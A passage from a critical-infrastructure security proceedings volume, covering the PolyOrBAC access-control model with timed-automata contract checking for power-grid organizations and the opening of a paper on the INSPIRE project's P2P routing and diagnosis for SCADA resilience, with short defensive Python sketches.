To overcome these limitations, we proposed the MultiOrBAC model in [9]. The main question addressed by MultiOrBAC is: in a distributed system, how can remote accesses be securely managed? To answer this question, we first introduced the Role-in-Organization (RiO), View-in-Organization (ViO), Activity-in-Organization (AiO) and Context-in-Organization (CiO) concepts. Then, we simply transform the OrBAC rules by replacing r by RiO, v by ViO, a by AiO and c by CiO. In this respect, security rules have the Permission(RiO, ViO, AiO, CiO) form. Therefore, contrary to OrBAC, a MultiOrBAC rule may involve two different organizations (which do not necessarily belong to the same hierarchy): the organization where the role is played, and the organization to which the view and the activity belong. However, in the context of CIs, MultiOrBAC presents several weaknesses. MultiOrBAC offers the possibility to define local rules and accesses for external roles, without having any information about who plays these roles and how the (user, role) association is managed in the remote organization. This causes a serious problem of responsibility and liability: who is responsible in case of remote abuses of privileges? How can the organization owning the object have total confidence in the organization to which the user belongs? The MultiOrBAC logic is thus not adapted to CIs, where competing organizations can have mutual suspicions. Moreover, in MultiOrBAC the access control decision and enforcement are done by each organization, which means that the global security policy is in fact defined by the set of the organizations' security policies. It is thus difficult to enforce and maintain the consistency of the global security policy, in particular if each organization's security policy evolves independently. Finally, the enforcement of the policy by access control mechanisms is treated neither in OrBAC nor in MultiOrBAC. It is thus necessary to describe a secure architecture and a suitable implementation of the security of the studied CI. To summarize, even if OrBAC and MultiOrBAC present some benefits over traditional security models, they are not really adapted to CIs. To cover the limitations cited above, we suggest enhancing OrBAC with new collaboration-related concepts and calling on some mechanisms of the Web Services (WS) technology [10][11]. The global framework is called PolyOrBAC.
3.3 PolyOrBAC
Let us recall that WS technology provides platform-independent protocols and standards used for exchanging heterogeneous, interoperable data services. Software applications written in various languages and running on various platforms can use WS to exchange data over networks in a manner similar to inter-process communication on a single computer. WS also provide a common infrastructure and services (e.g., middleware) for data access, integration, provisioning, cataloging and security. These functionalities are made possible through the use of open standards, such as: XML, for exchanging heterogeneous data in a common information format [12]; SOAP, which acts as a data transport mechanism to send data between applications on one or several operating systems [13]; WSDL, used to describe the services that a business (e.g., an organization within a CI) offers and to provide a way for individuals and other businesses to access those services [14]; and UDDI, an XML-based registry/directory for businesses worldwide, which enables businesses to list themselves and their services on the Internet and to discover each other [15]. Basically, PolyOrBAC operates in two phases.
First phase: publication and negotiation of collaboration rules as well as the corresponding access control rules. First, each organization determines which resources it will offer to external partners.
Web services are then developed on application servers and referenced on the Web interface, to be accessible to external users. Second, when a CI publishes its WS in the UDDI registry, the other organizations can contact it to express their wish to use the WS. To highlight the PolyOrBAC concepts, let us take a simple example where organization B offers WS1, and organization A is interested in using WS1. Third, A and B come to an agreement concerning the use of WS1. Then, A and B establish a contract and jointly define security rules concerning the access to WS1. The contract aspects will be discussed in the next section; in the rest of this section, let us focus on access control rules. These rules are registered in an OrBAC format in databases located on both A's and B's CIS switches. For instance, if the agreement between A and B is "users from A have the permission to consult B's measurements in the emergency context", B should, in its OrBAC policy:
– have (or create) a rule that grants the permission to a certain role (e.g., OPERATOR) to consult its measurements: Permission(B, Operator, Measurements, Consulting, Emergency);
– create a VIRTUAL USER, noted PartnerA, that represents A for its use of WS1;
– add the Empower(B, PartnerA, Operator) association to its rule base. This rule grants the user PartnerA the right to play the OPERATOR role.
In parallel, A creates locally a VIRTUAL OBJECT WS1 Image, which (locally in A) represents the remote WS1 (i.e., the WS offered by B), and adds a rule in its OrBAC base to define which of A's roles can invoke WS1 Image to use WS1.
Second phase: runtime access to remote services. Let us first note that we use an AAA (Authentication, Authorization and Accounting) architecture: we separate authentication from authorization; we distinguish access control decisions from permission enforcement; and we keep access logs in the CIS switches (this point will be discussed in the next section). Basically, if a user from A (let us call her Alice) wants to carry out an activity, she is first authenticated by A. Then, protection mechanisms of A check whether the OrBAC security policy (of A) allows this activity. We suppose that this activity contains local as well as external accesses (e.g., an invocation of B's WS1). Local accesses are controlled according to A's policy, while the WS1 invocation is controlled both by A's policy (Alice must play a role that is permitted to invoke WS1 Image) and by B's CIS, according to the contract established between A and B. If both access control mechanisms grant the invocation, WS1 is executed under the control of B's OrBAC policy (in B, PartnerA plays role Operator, which is permitted to consult measurements). More precisely, in our implementation, when Alice is authenticated and authorized (by A's policy) to invoke WS1, an XML-based authorization ticket T1 is generated and granted to Alice. T1 contains access-related information such as: the VIRTUAL USER played by Alice (PartnerA); Alice's organization (A); the contract ID; the requested service (WS1); the invoked method (e.g., Select); and a timestamp to prevent replay attacks. Note that T1 is delivered to any user from A allowed to access WS1 (e.g., Jean, Alice). When Alice presents her request as well as T1 (as a proof) to B, B's CIS
extracts the T1’s parameters, and processes the request. By consulting its security rules, B associates the Operator role to the VIRTUAL USER PartnerA according to Empower(B, PartnerA, Operator). Finally, the access decision is done according to Permission(B, Operator, Measurements, Consulting, Emergency) ∧ Empower(B, PartnerA, Operator). Let us now apply PolyOrBAC to a real electric power grid scenario: in emergency conditions, the TS CC (Transmission System Control Center) can trigger load shedding on the DS (Distribution System) to activate defense plan actions (e.g., to prevent an escalading black-out) on the Distribution Grid. More precisely, the TS CC (Transmission System Control Center) monitors the Electric Power System and elaborates some potentially emergency conditions that could be remedied with opportune load shedding commands applied to particular areas of the Grid. As indicated in Fig. 1 and Fig. 2, during normal operation, the Distribution Substations (DSS) send signals and measurements (voltage, Frequency, etc.) to the Transmission System Control Center TS CC (via the Distribution System Control Center DS CC); in the same way, the Transmission Substations (TSS) send signals and measurements to the TS CC (steps 1, 2 and 3 in Fig. 1). At the TS CC level, when the TSO (Transmission System Operator) detects that a load shedding may be needed in the near future, it sends an arming request to the DS CC (step 4 in Fig. 1). Consequently, the DSO (Distribution System Operator) selects which distribution substations (DSS) must be armed (these substations are those on which the load shedding will apply if a load shedding is necessary), and then sends arming commands to those DSS. The DSO has naturally the permission to arm or disarm any DSS in the area depending of the DS CC. If a Transmission SS (TSS) detects an emergency, it automatically triggers (sends) a load shedding command to all the DSS of its area. Of course, only the DSS already armed will execute the load shedding command. In this scenario, we distinguish four organizations (TS CC, a TSS, DS CC and a DSS), two roles (TSO and DSO) and four web services (Fig. 2): Arming Request, Arming Activation, Confirmed Arming and Load Shedding Activation. Basically, when negotiating the provision/use of WS1 between TS CC and DS CC, on the one hand, TS CC locally stores the WSDL description file and creates a new object as a local image of WS1 (whose actions correspond to WS1 invocations), and on the other hand, DS CC creates a virtual user (playing a role authorized to invoke WS1) to represent TS CC. Moreover, TS CC adds local rules allowing Alice, a user playing the role TSO, to invoke WS1 image: Empower(TS CC, Alice, TSO), and Permission(TS CC, TSO, Arm, TSO Distribution Circuits, Emergency). In this respect, when Alice requests the access to WS1, the access decision is done according to the following rule: Permission(TS CC, TSO, Arm, TSO Distribution Circuits, Emergency) ∧ Empower(TS CC, Alice, TSO) ∧ Consider(TSO NCC, rwx, Arm) ∧ Use (TS CC, WS1 Image, TSO Distribution Circuits) ∧ Hold(TS CC, Alice, rwx, WS1 Image, emergency) → is-permitted(Alice, rwx, WS1 Image) Besides, at the DS CC site, two rules are added: Empower(DS CC, Virtual User1, Operator) and Permission(DS CC, Operator, Access, DSO Distribution Circuits, emergency). Consequently, when Alice invokes WS1 Image, this invocation is transmitted to the DS CC by activating a process (running for Virtual User1) which invokes WS1.
Fig. 1. The exchanged commands
Fig. 2. The different WS invocations
This access is checked according to DS CC's policy and is granted according to the rule:
Permission(DS CC, Operator, Arm, DSO Distribution Circuits, Emergency) ∧ Empower(DS CC, Virtual User1, Operator) ∧ Consider(DSO ACC, execute, Arm) ∧ Use(DSO ACC, WS1, TSO Distribution Circuits) ∧ Hold(DSO ACC, Virtual User1, execute, WS1, emergency) → Is_permitted(Virtual User1, execute, WS1)
This example shows that PolyOrBAC is a convenient framework for expressing CI security policies. Table 1 compares the three models presented above by confronting them with the CI security requirements identified in Section 2. In the table we use a "0, 1, 2" scale to distinguish the degree to which each model satisfies a requirement: 0 = none; 1 = a little; 2 = good. As Table 1 indicates, PolyOrBAC is more suitable than the other two models. However, it has some limitations, essentially related to:
– The handling of competition / mutual suspicion between CIs: PolyOrBAC (like MultiOrBAC) offers the possibility to grant local accesses to external users without having any information about how the (user, role) association is managed in the remote organization.
– Support, enforcement and real-time checking of contracts established between different CIs: the system must be able to check that signed contracts are respected. A contract generally contains clauses with temporal constraints, actions / workflows, deontic modalities (e.g., obligations) and sanctions. All this is out of the scope of the PolyOrBAC model, but is addressed in the next section.
– Audit logging and assessment of the different actions: every deviation from the signed contracts should trigger an alarm and notify the concerned parties. This is also addressed in the next section.
The challenge now is to find a convenient framework that captures all these aspects. Actually, we believe that most of these requirements (except deontic modalities) can be specified by timed automata.
Table 1. Comparing PolyOrBAC with traditional access control models

                                                 OrBAC  MultiOrBAC  PolyOrBAC
Organizations in competition / mutual suspicion   0        0           2
Autonomous organizations                          1        1           2
Coherence and consistency                         2        1           2
Decentralization                                  0        1           2
Heterogeneity                                     2        2           2
Granularity vs. scalability                       2        2           2
Fine-grained access control                       2        2           2
Easiness of rules administration                  2        0           2
Handling external accesses                        2        2           2
Confidentiality, integrity and availability       2        2           2
Permissions, prohibitions and obligations         2        2           2
Audit logging and assessment                      0        0           0
Using standards to enforce the policy             0        0           2
Our choice is also motivated by the possibility of checking the correctness of the automata behavior and by the availability of several tools dedicated to this issue. The next section extends timed automata [16] to capture the e-contract security requirements and shows how we can verify some security properties and enforce them at run-time by model checking.
4 Runtime Model Checking of the Exchanged Messages
Permissions correspond to actions that are authorized by the contract clauses. In our timed automata model, permitted actions are specified by transitions. For instance, in Fig. 3, the system can (i.e., has the permission to) execute the action a at any time and then behaves like the automaton A.
Fig. 3. Modeling Permissions
Fig. 4. Modeling Prohibitions
Second, we distinguish two kinds of prohibitions in e-contracts:
– Implicit prohibitions: the idea is to specify only permissions in the automata. The states, actions and transitions not represented in the automata are in essence prohibited, because the runtime model checker will not recognize them.
– Explicit prohibitions: explicit prohibitions can be particularly useful in the management of decentralized policies / contracts, where each administrator does not have details about the other organizations participating in the CII. Moreover, explicit prohibitions can also specify exceptions or limit the propagation of permissions in case of hierarchies. In our model, we specify explicit prohibitions by adding a "failure state" to which the system is automatically led if a malicious action is detected. In Fig. 4, as the a action is forbidden, its execution automatically leads to the failure state depicted by an "unhappy face".

Let us now deal with obligations. Obligations are actions that must be carried out; otherwise the concerned entity will be subject to sanctions. Besides, as every obligation is also a permission, obligations are specified by particular transitions (in the same way as permissions). However, as obligations are stronger than permissions, we add additional symbols to capture this semantics and to distinguish between what is mandatory and what is permitted but not mandatory. To model obligations, we use transition time-outs and invariants. Obligations are very important in the context of CIs, where we can find rules such as: a power generation station has an obligation to supply data from its plant to the Independent System Operator (ISO) and the Transmission Company (TRANSCO); the system has the obligation to report alarms, notify the administrator and keep an audit trail; the ECI Directive imposes (on the owners of a CI) the establishment of an Operator Security Plan, which identifies the ECI owners' and operators' assets and establishes relevant security solutions for their protection. We distinguish two kinds of obligations: internal and external obligations.

– An internal obligation is a set of mandatory actions that must be performed by local entities (possibly constrained by a maximum delay). An obligation is automatically triggered by an event such as a change in the context or a particular message exchanged between the contracting entities.
– An external obligation is a set of mandatory actions that must be performed by remote entities, but checked by local entities.

In this respect, an obligation is considered as a simple transition, and if a maximum delay is assigned to the obligation, a time-out (noted d in Fig. 5) is set for the delay. When the obligation is fulfilled, this event resets the time-out and the system behaves like A1. On the contrary, if the time-out expires, an exception is raised and the system behaves like A2 (which can be considered as exception handling). When an explicit prohibition is carried out or when an obligation is not fulfilled, a conflicting situation arises (e.g., one of the parties does not comply with the contract clauses), and the automaton automatically makes a transition to a dispute situation (i.e., to the unhappy state) or triggers an exception processing (A2 in Fig. 5). Modeling disputes allows us not only to identify anomalies and violations, but also to go further by identifying the activities (successions of actions, interactions) that led to these situations, which can finally lead automatically to the cancellation of the contract. Moreover, as disputes have different severities and are not all subject to the same sanctions, we use variables (i.e., labels on the unhappy state) to distinguish the different kinds of disputes as well as the corresponding sanctions (Fig. 6).
Fig. 5. Modeling obligations
Fig. 6. Modeling dispute situations
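To illustrate how these constructs could be enforced at run time, the following sketch renders a simplified contract monitor in Python; it is our own minimal rendering (the state names, action set and deadline are hypothetical), not the authors' implementation. Actions absent from the transition table are implicitly prohibited, explicitly forbidden actions lead to the failure ("unhappy") state, and an obligation left unfulfilled beyond its maximum delay d triggers the exception transition:

```python
# Simplified runtime monitor for a timed-automaton contract (illustrative
# sketch; the state names and the action set are hypothetical).

FAIL = "failure"          # the "unhappy" state reached on prohibitions
EXCEPTION = "exception"   # the A2-like state reached on expired obligations

class ContractMonitor:
    def __init__(self, transitions, forbidden, obligation, deadline):
        self.transitions = transitions  # (state, action) -> next state
        self.forbidden = forbidden      # explicitly prohibited actions
        self.obligation = obligation    # action that must occur ...
        self.deadline = deadline        # ... before this time-out d
        self.state = "init"

    def observe(self, action, time):
        # Expired obligation: raise the exception transition (behave like A2).
        if self.obligation and time > self.deadline:
            self.state = EXCEPTION
            return self.state
        # Explicit prohibition: go to the failure ("unhappy") state.
        if action in self.forbidden:
            self.state = FAIL
            return self.state
        # A fulfilled obligation resets the time-out.
        if action == self.obligation:
            self.obligation = None
        # Implicit prohibition: unknown transitions are not recognized.
        self.state = self.transitions.get((self.state, action), FAIL)
        return self.state

m = ContractMonitor(
    transitions={("init", "request"): "serving", ("serving", "report"): "init"},
    forbidden={"disclose"},
    obligation="report",   # e.g. the obligation to report alarms
    deadline=10.0,         # maximum delay d
)
print(m.observe("request", 1.0))  # serving
print(m.observe("report", 5.0))   # init (obligation fulfilled in time)
```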
In this section, we presented a homogeneous model to specify the most relevant security requirements for contracts (workflows, actions, permissions, prohibitions, obligations, time constraints, disputes). Of course, this model should be instantiated according to the contracts in use; due to space limitations it is not possible to present our whole scenario in this paper. Once the expected behaviors of the contracting parties are modeled by timed automata, we can (1) verify whether the system can reach a dispute state, (2) maintain an audit log and perform model checking at runtime, and (3) notify the concerned parties in case of contract violation. Actually, proving that no possible execution of the system ever leads to a conflicting situation is equivalent to proving that the exchange protocol can be run according to the contract clauses. In our implementation, the automata are modeled with the UPPAAL model checker [17] [18], and the reachability properties are expressed in Computation Tree Logic (CTL) [19]. For example, the property E<> organization.Dispute stands for: "there exists at least one execution where the organization reaches the dispute state". Conversely, the property A[] not organization.Dispute means that none of the possible executions will lead the organization to a dispute state.
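Assuming the automata are saved in an UPPAAL model file, the two properties can be checked in batch with UPPAAL's command-line verifier verifyta, roughly as follows (the file names are hypothetical, and the exact options may vary between UPPAAL versions):

```python
# Sketch: batch-checking the two properties with UPPAAL's command-line
# verifier (file names are hypothetical; see the UPPAAL documentation).
import subprocess

with open("contract.q", "w") as f:
    f.write("E<> Organization.Dispute\n")      # some run reaches a dispute
    f.write("A[] not Organization.Dispute\n")  # no run ever reaches a dispute

# verifyta takes the timed-automata model and the query file.
result = subprocess.run(
    ["verifyta", "contract.xml", "contract.q"],
    capture_output=True, text=True,
)
print(result.stdout)
```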
5 Conclusions

This paper presented an access control framework for CIs. We first identified the most relevant security-related requirements of CIs. Then, according to these requirements, we proposed the PolyOrBAC security model and compared it with two other models. Through the use of web services technology, PolyOrBAC offers a decentralized management of the access control policies and an architecture where organizations mutually negotiate contracts for collaboration. We concluded that PolyOrBAC is well adapted to CI organizations, but we also emphasized its limits and weaknesses. In particular, PolyOrBAC, by itself, supports neither the enforcement nor the real-time checking of the exchanges that are established between the different organizations participating in a CI. Moreover, PolyOrBAC does not provide auditing of the different actions. We thus enhanced PolyOrBAC with a runtime model checking framework that captures the security requirements of CI contracts and that can be instantiated according
to the actual context of a given CI. Our model checker is also used to check the correct execution of the contracts and to verify some security properties. This approach can be extended by taking into account availability and integrity requirements. Availability can be handled by means of obligation rules, making it mandatory to provide enough resources to achieve the requested activities, even in case of events such as component failures or attacks. For integrity, our approach is based on controlling information flows, preventing flows from low-criticality tasks to high-criticality tasks, except when such flows are validated by means of adequate fault-tolerance mechanisms, as expressed in Totel's model [20].
Acknowledgments

This work is partially supported by the CRUTIAL (CRitical UTility InfrastructurAL Resilience) European FP6-IST research project, the European Network of Excellence ReSIST and the Airbus ADCN Security project.
References

1. Massoud, A.: North America's Electricity Infrastructure: Are We Ready for More Perfect Storms? IEEE Security and Privacy 1(5), 19–25 (2003)
2. NERC, Critical Infrastructure Protection Standards CIP-001-1 to CIP-009-1, http://www.nerc.com/page.php?cid=2|20
3. Sources: Staged cyber attack reveals vulnerability in power grid, http://edition.cnn.com/2007/US/09/26/power.at.risk/index.html
4. Kilman, D., Stamp, J.: Framework for SCADA Security Policy. Sandia Corp., 10 (2005)
5. Abou El Kalam, A., Baina, A., Beitollahi, H., Bessani, A., Bondavalli, A., Correia, M., Daidone, A., Deconinck, G., Deswarte, Y., Grandoni, F., Neves, N., Rigole, T., Sousa, P., Verissimo, P.: CRUTIAL Project: Preliminary Architecture Specification. CRUTIAL project, Deliverable D4 (January 2007), http://crutial.cesiricerca.it/content/files/Documents/Deliverables%20P1/WP1-D2-final.pdf
6. Information Technology Security Evaluation Criteria (ITSEC): Preliminary Harmonised Criteria. Document COM(90) 314, V 1.2. Commission of the European Communities (June 1991), http://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC-uk.pdf
7. Abou El Kalam, A., Balbiani, P., Benferhat, S., Cuppens, F., Deswarte, Y.: Organization Based Access Control. In: IEEE 4th Int. Workshop on Policies for Distributed Systems, POLICY 2003, June 4-6, pp. 120–131. IEEE Computer Society Press, Como (2003)
8. Sandhu, R., Coyne, E.J., Feinstein, H.L., Youman, C.E.: Role-based access control models. IEEE Computer 29(2), 38–47 (1996)
9. Abou El Kalam, A., Deswarte, Y.: Multi-OrBAC: a New Access Control Model for Distributed, Heterogeneous and Collaborative Systems. In: 8th International Symposium on Systems and Information Security, SSI 2006, Sao Jose Dos Campos, Sao Paulo, Brazil (2006)
10. Abou El Kalam, A., Deswarte, Y., Baina, A., Kaâniche, M.: Access Control for Collaborative Systems: A Web Services Based Approach. In: IEEE Int. Conference on Web Services, ICWS 2007, July 9-13, pp. 1064–1071. IEEE Computer Society Press, Salt Lake City (2007)
11. Baina, A., Abou El Kalam, A., Deswarte, Y., Kaâniche, M.: A Collaborative Access Control Framework for Critical Infrastructures. In: IFIP 11.10 Conference on Critical Infrastructure Protection, ITCIP 2008, Washington, DC, USA, March 16-19 (2008)
12. W3C, Extensible Markup Language (XML), W3C Recommendation (February 2004)
13. W3C, SOAP, Version 1.2, W3C Recommendation (June 2003)
14. W3C, WSDL, Version 2.0, W3C Candidate Recommendation (March 2006)
15. OASIS, UDDI Specifications TC, Universal Description, v3.0.2 (February 2005)
16. Alur, R., Dill, D.L.: A theory of Timed Automata. Theoretical Computer Science 126(2), 183–235 (1994)
17. UPPAAL tool, http://www.uppaal.com
18. Larsen, K.G., Pettersson, P., Yi, W.: UPPAAL in a nutshell. Journal of Software Tools for Technology Transfer 1(1-2), 134–152 (1997)
19. Bérard, B., Bidoit, M., Finkel, A., Laroussinie, F., Petit, A., Petrucci, L., Schnoebelen, P., McKenzie, P.: Systems and Software Verification, Model Checking Techniques and Tools. Springer, Heidelberg (2001)
20. Totel, E., Blanquart, J.P., Deswarte, Y., Powell, D.: Supporting multiple levels of criticality. In: 28th IEEE Fault Tolerant Computing Symposium, Munich, Germany, June 1998, pp. 70–79 (1998)
INcreasing Security and Protection through Infrastructure REsilience: The INSPIRE Project

Salvatore D'Antonio1, Luigi Romano2, Abdelmajid Khelil3, and Neeraj Suri3

1 Consorzio Interuniversitario Nazionale per l'Informatica
[email protected]
2 Dipartimento per le Tecnologie - University of Napoli Parthenope
[email protected]
3 Department of Computer Science - TU Darmstadt
[email protected], [email protected]

Abstract. The INSPIRE project aims at enhancing the European potential in the field of security by ensuring the protection of critical information infrastructures through (a) the identification of their vulnerabilities and (b) the development of innovative techniques for securing networked process control systems. To increase the resilience of such systems INSPIRE will develop traffic engineering algorithms, diagnostic processes and self-reconfigurable architectures along with recovery techniques. Hence, the core idea of the INSPIRE project is to protect critical information infrastructures by appropriately configuring, managing, and securing the communication network which interconnects the distributed control systems. A working prototype will be implemented as a final demonstrator of selected scenarios. Controls/communication experts will support project partners in the validation and demonstration activities. INSPIRE will also contribute to the standardization process in order to foster multi-operator interoperability and coordinated strategies for securing lifeline systems.
1 Introduction

Systems that manage and control infrastructures over large geographically distributed areas are typically referred to as Supervisory Control and Data Acquisition (SCADA) systems. A SCADA system is composed of a central core, where system information acquisition and control are concentrated, and a number of RTUs (Remote Terminal Units) equipped with limited computational resources. RTUs communicate with the centre by sending to it and receiving from it short real-time control messages. Increasingly, the pressures of modernization, integration, cost, and security have forced SCADA systems to migrate from closed proprietary systems and networks towards Components Off The Shelf (COTS) products and hardware, standard network protocols, and shared communication infrastructure. As a consequence, current SCADA systems are vulnerable to attacks due to the open system concept adopted by vendors. An attack could be, for example, (a) an exploit against the field network based on wireless technologies, or (b) an attack that constricts or prevents the real-time delivery of SCADA messages, resulting in a loss of monitoring information or of control of portions of the SCADA system. An attacker may engineer a denial of service (DoS) to inhibit some vital features
of a complex SCADA system, such as control data aggregation in a distributed or layered control system, or a lack of real-time status and historical data synchronization in a central SCADA back-up system. While the physical security of critical infrastructure components (including the control system) is garnering considerable attention, less attention has been paid so far to the analysis of vulnerabilities resulting from the use of shared communication networks to transport management information between the ICT systems devoted to the control of critical infrastructures. In this paper we present the INSPIRE (INcreasing Security and Protection through Infrastructure REsilience) project, which aims at extending basic SCADA functionality as well as improving the effectiveness of security systems devoted to preventing, detecting, and tolerating intrusions in SCADA networks. Specifically, by taking into account the stringent security-related requirements that networked Process Control Systems place on the underlying communication infrastructure, the project aims to design techniques such as peer-to-peer overlay routing mechanisms and to develop diagnosis and recovery techniques for SCADA systems. Overall, the core idea of the INSPIRE project is to protect networked process control systems and, in turn, critical information infrastructures by appropriately configuring, managing, and securing the underlying communication network. The analysis of the specific properties and security requirements of Process Control Systems will drive the design and development of techniques capable of making the network more resilient and reliable. The remainder of the paper is structured as follows. In Section 2 we present peer-to-peer overlay routing as a promising technique for SCADA resilience. Section 3 illustrates a distributed approach to SCADA systems diagnosis. In Section 4 the most relevant research initiatives in the area of Critical Information Infrastructure Protection are presented, emphasizing their potential relationships with the INSPIRE project. Finally, Section 5 provides some concluding remarks.
2 Peer-to-Peer Overlay Routing for Resilient SCADA Systems

Peer-to-peer (P2P) overlay networks generalize the established centralized Client-Server architecture (as in SCADA systems) and create a decentralized architecture where equal peer nodes simultaneously act as clients and servers. Along with this decentralized architecture, P2P overlays provide self-organization and self-healing properties, which highlights the potential of P2P for building resilient SCADA systems. Furthermore, P2P architectures allow for masking strong heterogeneities in both communication nodes and links, making them very attractive for interconnecting the inherently heterogeneous SCADA critical infrastructures. In addition, P2P overlays cope well with the dynamic topologies that future SCADA systems are tending towards as they integrate dynamic ad hoc networks. Consequently, we consider P2P to play a major role in protecting critical infrastructures by enhancing their self-* properties and enabling their controlled evolvability. As the trend towards all-IP devices in modern and future SCADA systems is obvious, the main infrastructural pre-condition for deploying P2P overlays is provided. The INSPIRE project aims at investigating the characteristics of P2P for the purpose of hardening SCADA systems against cyber-attacks. When it appears that real-time message delivery constraints are not being met (for example,
given a denial of service attack), a P2P overlay network can be used to route message floods in an effort to ensure delivery. In addition, P2P allows for a controlled replication of SCADA-related data, which strengthens the resilience of SCADA responsiveness. In particular, in case of failures or attacks, the P2P overlay may act as a back-up service. In INSPIRE we will investigate the benefits of deploying P2P architectures in existing as well as in future SCADA systems. For existing ones we will investigate the cost trade-off between replacing existing non-P2P-enabled nodes and keeping them while adding a few additional P2P-enabled nodes. We are aware that P2P usage consumes bandwidth which the critical SCADA applications rely upon. We will specifically consider this issue in the design of the INSPIRE P2P overlay network through (a) minimizing the P2P-related traffic, (b) reserving a bounded bandwidth for P2P, (c) prioritizing the P2P traffic content, and (d) monitoring the P2P traffic for hot-spot identification. To provide for these capabilities, we propose an on-demand use of the P2P overlay network, e.g. upon intrusion detection; otherwise the P2P service remains passive. In INSPIRE, existing P2P systems will be assessed with respect to their suitability for SCADA systems and their ability to fulfil SCADA requirements. In particular, we will ensure that the P2P deployment will not introduce new vulnerabilities to the system. This is achievable through the selection of closed P2P systems or of systems that enable attack detection and recovery. A closed P2P overlay is characterized by the fact that peers are authorized and known a priori, and that only authorized entities can add/remove peers if needed. The SCADA system and P2P nodes utilize strong hardware-based authentication techniques to prevent the injection of false data or commands, and to harden the routing overlay. Threat modelling and vulnerability assessment for P2P-enabled SCADA systems will also be performed. Accordingly, we will provide guidelines for augmenting SCADA systems with P2P networks for the purpose of protection, while addressing the trade-offs between benefits and risks. In INSPIRE we consider interconnected SCADA systems where the network topology is typically a mesh of heterogeneous tree-based single SCADA systems. The tree topology is usually seen in isolated SCADA systems and is thus not used here. Furthermore, modern wireless SCADA systems allow for spontaneous networking, enabling dynamic/evolvable and large-scale topologies. The considered meshed SCADA systems typically show strong heterogeneities in both communication nodes and links. Their reliance on COTS and open components increases the number of threats and cyber attacks they are exposed to. In addition, operational perturbations such as dynamic topology changes and environmental failures may occur. In case of perturbations and attacks the real-time SCADA data may get either lost or invalidated, which may lead to catastrophic consequences. This highlights the need for a middleware that can run on top of various existing infrastructures and that is highly scalable and resilient to perturbations (both failures and attacks) by providing for self-organization and self-healing. P2P architectures are well suited for such network topologies. We will proceed progressively by considering an overlay network initially connecting the central rooms, and subsequently involving RTUs. The type of P2P architecture that we believe to be appropriate for SCADA systems is a closed P2P system [1].
This is useful as policies specifically control access to the overlay and impose dedicated rules for inter-node communication (such as on the topology, i.e. the node degree and the neighborhood). In order to provide for a controlled/predictable communication environment, we believe the structured and
hybrid P2P [2] to be more applicable for inter-SCADA linkages than unstructured or classical P2P. The hybrid architecture is characterized by a partial reliance on a central server, which can be utilized for critical operations such as strict identity management and access control. Deploying a structured P2P overlay in SCADA systems furthermore limits the overhead traffic and, as a consequence, simplifies securing the overlay. As we plan to tag, prioritize and limit the P2P-related traffic, the perturbations to the SCADA application traffic can be easily controlled. In addition to considering a closed, structured and hybrid P2P system (and in order to prevent new vulnerabilities from being introduced), we plan to derive a threat model for P2P-enabled SCADA systems, identifying potential vulnerabilities and designing counter-measures for them while learning from existing experiences [3][4][5][6][7][8][9]. INSPIRE aims at adapting P2P architectures to SCADA systems to enhance their resilience to operational perturbations or deliberate breaches. Our main objective is to maintain full or partial functionality (graceful degradation) after failures or attacks. Here, we focus on the main SCADA operation and the system responsiveness, i.e., the timeliness and reliability of the delivery of sensor data and actuator commands (see our example of re-routing after a DoS attack). In INSPIRE we will focus on path and data redundancy, easily provided by the P2P architecture, as the main techniques to maintain the required responsiveness. In particular, we plan to design mechanisms for multi-path P2P routing and for secure distributed storage of SCADA data, allowing for fault-tolerant data transport that meets the reliability and timeliness requirements of the application, as sketched below. Furthermore, we plan to investigate further uses of the deployed P2P overlay such as the support for failure diagnosis, QoS provisioning, security and trust management (testing, monitoring etc.) in inter-connected SCADA systems. Overall we will derive best practices and define a domain-tunable framework that can be easily adapted to different SCADA systems. Efforts for coordination between manufacturers, vendors and end-users are crucial to ensure that INSPIRE outcomes will be successfully adopted by these different parties. For example, beyond IP, IPsec and Virtual Private Networks (VPN) should be supported in future SCADA products. We identify some preliminary efforts to apply P2P concepts for the protection of SCADA critical infrastructures [10]; however, a more systematic and extensive investigation is still missing and will be carried out in INSPIRE in order to provide for resilient communication and control for interconnected critical infrastructures.
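As a rough illustration of the path-redundancy idea, the following sketch sends each SCADA message over several node-disjoint overlay paths, so that delivery succeeds as long as at least one path survives a failure or attack. The topology, peer names and API are invented for the example; this is not an INSPIRE deliverable:

```python
# Minimal sketch of multi-path delivery over a P2P overlay (hypothetical
# topology; illustrates path redundancy, not a real SCADA stack).

# Overlay adjacency: peers are control rooms / RTUs (hypothetical names).
overlay = {
    "ctrl": ["p1", "p2", "p3"],
    "p1": ["rtu"], "p2": ["rtu"], "p3": ["p4"], "p4": ["rtu"],
    "rtu": [],
}

def paths(src, dst, path=()):
    """Enumerate all loop-free overlay paths from src to dst (DFS)."""
    path = path + (src,)
    if src == dst:
        yield path
        return
    for nxt in overlay[src]:
        if nxt not in path:
            yield from paths(nxt, dst, path)

def node_disjoint(candidates):
    """Greedily pick paths whose intermediate nodes do not overlap."""
    chosen, used = [], set()
    for p in candidates:
        inner = set(p[1:-1])
        if not inner & used:
            chosen.append(p)
            used |= inner
    return chosen

def send_redundant(src, dst, msg, failed=frozenset()):
    """Deliver msg on every disjoint path; succeed if one path survives."""
    ok = False
    for p in node_disjoint(sorted(paths(src, dst), key=len)):
        if not (set(p) & failed):
            print(f"delivered {msg!r} via {'->'.join(p)}")
            ok = True
    return ok

# A DoS attack takes peer p1 down; delivery still succeeds via p2 (and p3-p4).
send_redundant("ctrl", "rtu", "actuator command", failed={"p1"})
```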
3 Development of Diagnosis and Recovery Techniques for SCADA Systems

In a SCADA system, the availability of dependable (i.e. accurate and timely) diagnostic mechanisms is paramount. The diagnostic process must be able to clearly identify the damaged components and to assess the extent of damage in individual components, in order to determine the effective fault/intrusion treatment and system reconfiguration actions (based on the adjudged causes of system misbehaviour). It is also important to determine when such actions should be performed, in order to maximize their beneficial effects while limiting the impact on the quality of the delivered service. Although diagnosis in distributed systems has been extensively studied, its application
to SCADA systems raises a variety of issues which have not been comprehensively addressed before. Such issues stem from a number of inter-related factors, which are briefly described in the following:

– First, the system architect is typically a system integrator. As such, he/she has limited knowledge of the internal mechanisms of individual components and subsystems;
– Second, individual components (such as RTUs) are heterogeneous, whereas the targets of traditional diagnosis are – to a large extent – homogeneous;
– Third, diagnostic activities must be conducted with respect to components which are large grained, whereas traditional applications typically consist of relatively fine-grained components;
– Fourth, repair or replacement of system units is costly and in some cases not possible at all (e.g. due to stringent requirements in terms of continuity of service).

